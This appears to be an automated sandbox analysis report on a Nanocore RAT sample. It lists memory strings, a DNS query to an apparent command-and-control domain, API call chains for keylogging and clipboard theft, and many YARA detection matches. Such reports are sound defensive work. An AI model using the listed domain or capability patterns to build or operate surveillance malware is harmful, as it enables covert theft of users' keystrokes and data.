Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown

DNS traffic detected: queries for: december2n.duckdns.org

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002E9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
